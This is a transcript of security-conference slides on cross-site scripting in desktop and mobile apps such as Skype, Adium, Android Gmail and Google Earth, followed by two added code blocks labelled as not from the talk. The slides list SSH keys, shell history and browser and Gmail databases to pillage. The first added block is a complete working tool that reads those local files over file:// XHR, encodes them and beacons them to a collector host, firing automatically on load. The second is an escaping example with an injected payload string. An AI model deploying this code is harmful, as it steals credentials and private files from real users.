The Hidden XSS - Attacking the Desktop & Mobile Platforms

Transcript of The Hidden XSS - Attacking the Desktop & Mobile Platforms

Page 1: The Hidden XSS - Attacking the Desktop & Mobile Platforms

The Hidden XSS: Attacking the Desktop & Mobile Platforms

Kos (Kyle Osborn) @theKos

Page 2

alert(self)

» ToorCon Seattle, BlackHat, BSidesLV & DefCon

» Red Team guy (or so I pretend)

» Pentester

» http://kos.io/

» Oh, and this guy

Page 3

XSS within the browser

» Usually considered a web browser based attack.

» Users fire up their web browsers

» Navigate to website with persistent XSS

» Open up link with payload in the URL (bank.com?XSS)

» iFrame with embedded vulnerable website

» etc., etc.

» But... not really browser specific...

Page 4

XSS

Definition of XSS:

Cross-site scripting is a security hazard that allows crackers to interfere with your program’s logic by inserting their own logic into your HTML. ....

http://oreilly.com/ruby/excerpts/ruby-learning-rails/ruby-glossary.html

Page 5 (no transcribed text)

Page 6

XSS without the browser 

» So what's the big deal?

» Not really able to steal cookies.

» Phishing doesn't make sense.

» Content spoofing?

» Ad injection?

» Meh...

Page 7

XSS without the browser

» Local filesystem access?

» WebKit does not block XHR requests to file:///

» OS X, iOS, Android versions of WebKit

» Except for Chrome (it refuses file:// to file:// XHR unless started with --allow-file-access-from-files)

» XMLHttpRequest()

Page 8

So... the fun stuff

» Demos!

Page 9

Demo #1

» HTML not filtered in one place, allowing an attacker to inject malicious JavaScript.

» http://kos.io/skype for more info

» Skype (5.0.x to <= 5.0.914) on Mac OS X

Page 10

Demo #2

» Adium <= 1.4.2 (OS X)

» Unfiltered HTML in file transfer dialogue.

» Almost the same as Skype.

» http://www.noptrix.net/advisories/adium_inject.txt

Page 11

Demo #3

» Skype on iOS 3.0.1 (Fixed as of 3.0.2)

» Again, basic Cross Site Scripting

» Discovered by while testing Skype on OS X

» More info at https://superevr.com/2011/xss-in-skype-for-ios/

Page 12

Demo #3

Page 13 (no transcribed text)

Page 14

Introducing WebOS

» Truly web-driven operating system

» Easy application development

» Poised to compete with iOS / Android

» Oh yeah, apps are HTML5 / JavaScript

Page 15

WebOS

» Because most apps are HTML/JS, many are susceptible to attacks.

» However... actually more secure than the targets of the previous vulns.

» Security (kind-of) done right on it.

Pages 16-19 (no transcribed text)

Page 20

Demo #5

» Android's GMail app

» Reported a few months ago...

» Android (like iOS) uses separate users per application, limiting what each app can reach.

Pages 21-22 (no transcribed text)

Page 23

Demo #5 - Continued

» GMail.apk allows HTML files to be downloaded.

» Handles it in "HTML Viewer" properly, without JS.

» However, XSS inside the Gmail app allows an attacker to force the download of a file.

» Then force browser to open file:///..../attack.html

Page 24

For my next trick... Choose an OS

» Linux

» Windows

» OS X

» iOS

Page 25

Demo #6

» Google Earth

» Multi-platform - OS X, iOS, Linux & Windows

» Payloaded KML file (Google Earth XML file)

» Uses HTML for info-boxes

» Uses a vulnerable WebKit version

Page 26

Tool!

» To make it easier, wrote a tool.

» JSON objects for discovery (which users, which app) and for the files to pillage

» base64 encodes & exfiltrates

Page 27

Tool!

var fileList = {}; // platform -> { discover, post }; declared so the two assignments below run as written

fileList['mac'] = {
    // How do we discover users?
    "discover": '/Library/Preferences/com.apple.loginwindow.plist',
    // Okay, we found them, what do we pillage?
    "post": {
        'bashHistory': '.bash_history',
        'sshHosts': '.ssh/known_hosts',
        'sshKeys': '.ssh/id_rsa.pub',
    }
};

fileList['android'] = {
    // Instead of how, just figure out the currently in use app
    "discover": '/proc/self/status',
    // Okay, we found them, what do we pillage?
    "post": {
        'browser_data': '/data/data/com.android.browser/databases/webview.db',
        'browser_data2': '/data/data/com.android.browser/databases/browser.db',
        'gmail_accounts': '/data/data/com.google.android.gm/shared_prefs/Gmail.xml',
        'dolpin_data': '/data/data/mobi.mgeek.TunnyBrowser/databases/webview.db',
        'dolpin_data2': '/data/data/mobi.mgeek.TunnyBrowser/databases/browser.db',
        'chromeBookmarks': '.config/chromium/Default/Bookmarks'
    }
};
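The discover-then-pillage loop that the Tool slides and the file:/// XHR point on Page 7 describe, as an added example; this is not the speaker's tool and the names below are mine. Assumptions not on the page: the loginwindow plist is readable as XML and the victim account is taken from its lastUserName key; Android discovery only records the Name: line of /proc/self/status; exfiltration is a GET image beacon to a hypothetical collector URL; the Android file list is trimmed to two entries. The read and exfil functions are injected so the loop can be exercised against a constructed in-memory filesystem as well as against real files from a file:// page.

```javascript
// Added example (not the talk's tool). Reads local files over XHR to file:///,
// base64-encodes them and hands them to an exfil callback.
var fileList = {
  mac: {
    discover: '/Library/Preferences/com.apple.loginwindow.plist',
    post: { bashHistory: '.bash_history', sshHosts: '.ssh/known_hosts', sshKeys: '.ssh/id_rsa.pub' },
  },
  android: { // trimmed to two of the slide's entries
    discover: '/proc/self/status',
    post: {
      browser_data: '/data/data/com.android.browser/databases/webview.db',
      gmail_accounts: '/data/data/com.google.android.gm/shared_prefs/Gmail.xml',
    },
  },
};

// Synchronous XHR read of a local file. Returns null when the engine refuses
// (Chrome does by default for file:// origins) or the file is missing/unreadable.
function xhrRead(path) {
  try {
    var xhr = new XMLHttpRequest();
    xhr.open('GET', 'file://' + path, false);
    xhr.send(null);
    // file:// responses report status 0 in most WebKit builds, 200 in others.
    return (xhr.status === 0 || xhr.status === 200) && xhr.responseText ? xhr.responseText : null;
  } catch (e) {
    return null;
  }
}

// Discovery: home directory on the Mac (assumption: lastUserName in the XML plist),
// process name on Android (assumption: the Name: line of /proc/self/status).
function discover(platform, text) {
  if (text === null) return null;
  if (platform === 'mac') {
    var m = /<key>lastUserName<\/key>\s*<string>([^<]+)<\/string>/.exec(text);
    return m ? { home: '/Users/' + m[1] } : null;
  }
  if (platform === 'android') {
    var n = /^Name:\s*(\S+)/m.exec(text);
    return n ? { app: n[1], home: null } : null;
  }
  return null;
}

// Resolve the post list to absolute paths; relative entries need a home directory.
function resolveTargets(post, ctx) {
  var out = {};
  Object.keys(post).forEach(function (label) {
    var p = post[label];
    if (p.charAt(0) === '/') out[label] = p;
    else if (ctx && ctx.home) out[label] = ctx.home + '/' + p;
  });
  return out;
}

function toBase64(s) {
  if (typeof Buffer !== 'undefined') return Buffer.from(s, 'utf8').toString('base64');
  return btoa(unescape(encodeURIComponent(s)));
}

// The loop: read(path) -> string|null, exfil(label, b64). Returns what was taken.
function pillage(platform, read, exfil) {
  var cfg = fileList[platform];
  var ctx = discover(platform, read(cfg.discover));
  var targets = resolveTargets(cfg.post, ctx);
  var taken = [];
  Object.keys(targets).forEach(function (label) {
    var data = read(targets[label]);
    if (data === null) return; // another app's sandbox, missing file, or blocked XHR
    var b64 = toBase64(data);
    exfil(label, b64);
    taken.push({ label: label, path: targets[label], b64: b64 });
  });
  return taken;
}

// Exfil as an image beacon: a plain GET, so no CORS involvement. Collector URL is hypothetical.
function beacon(collector) {
  return function (label, b64) {
    new Image().src = collector + '?f=' + encodeURIComponent(label) + '&d=' + encodeURIComponent(b64);
  };
}

// Only fire when actually loaded from a file:// page in a browser.
if (typeof XMLHttpRequest !== 'undefined' && typeof location !== 'undefined' && location.protocol === 'file:') {
  pillage('mac', xhrRead, beacon('http://collector.invalid/x'));
}
```

On Android the per-app UID noted on Page 20 is what makes most absolute entries come back null: only files inside the current app's own data directory are readable, which is why the loop tolerates failed reads instead of aborting.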

Page 28

Conclusion 

» XSS is bad, mkay?

» Developers don't know how / aren't trained to filter client side.

» Easy to exploit.

» Ping me at @theKos http://kos.io/
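The client-side filtering the conclusion says developers skip, as an added example that is not from the talk: a file-transfer notice built from an attacker-controlled file name, first the way the Skype and Adium demos describe (raw interpolation into markup that WebKit then parses), then with the five HTML metacharacters escaped before interpolation. The function names and the sample file name are mine.

```javascript
// Added example (not from the talk): vulnerable vs. escaped rendering of an
// untrusted string into an HTML-backed chat/file-transfer view.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, function (c) {
    return { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c];
  });
}

// The shape of the bug on the Skype / Adium slides: the file name goes straight into markup.
function renderTransferVulnerable(fileName, sizeBytes) {
  return '<div class="xfer">Incoming file: <b>' + fileName + '</b> (' + sizeBytes + ' bytes)</div>';
}

// Hardened: every untrusted string is escaped; the size is coerced to a number.
function renderTransferSafe(fileName, sizeBytes) {
  return '<div class="xfer">Incoming file: <b>' + escapeHtml(fileName) + '</b> (' + (Number(sizeBytes) || 0) + ' bytes)</div>';
}

// Cheap check over rendered output: strip the template's own tags; any '<' that
// still starts a tag means untrusted text reached the parser as markup.
function leaksMarkup(html) {
  var stripped = html.replace(/<\/?(div|b)\b[^>]*>/g, '');
  return /<[a-zA-Z!\/]/.test(stripped);
}

// Constructed sample: a file name carrying an event-handler payload.
var constructedName = 'report.pdf<img src=x onerror="alert(document.cookie)">';
```

Where the view is a live DOM rather than a string, the same rule is to assign untrusted values with textContent (or setAttribute) and never with innerHTML; escaping at the point of interpolation is what both forms have in common.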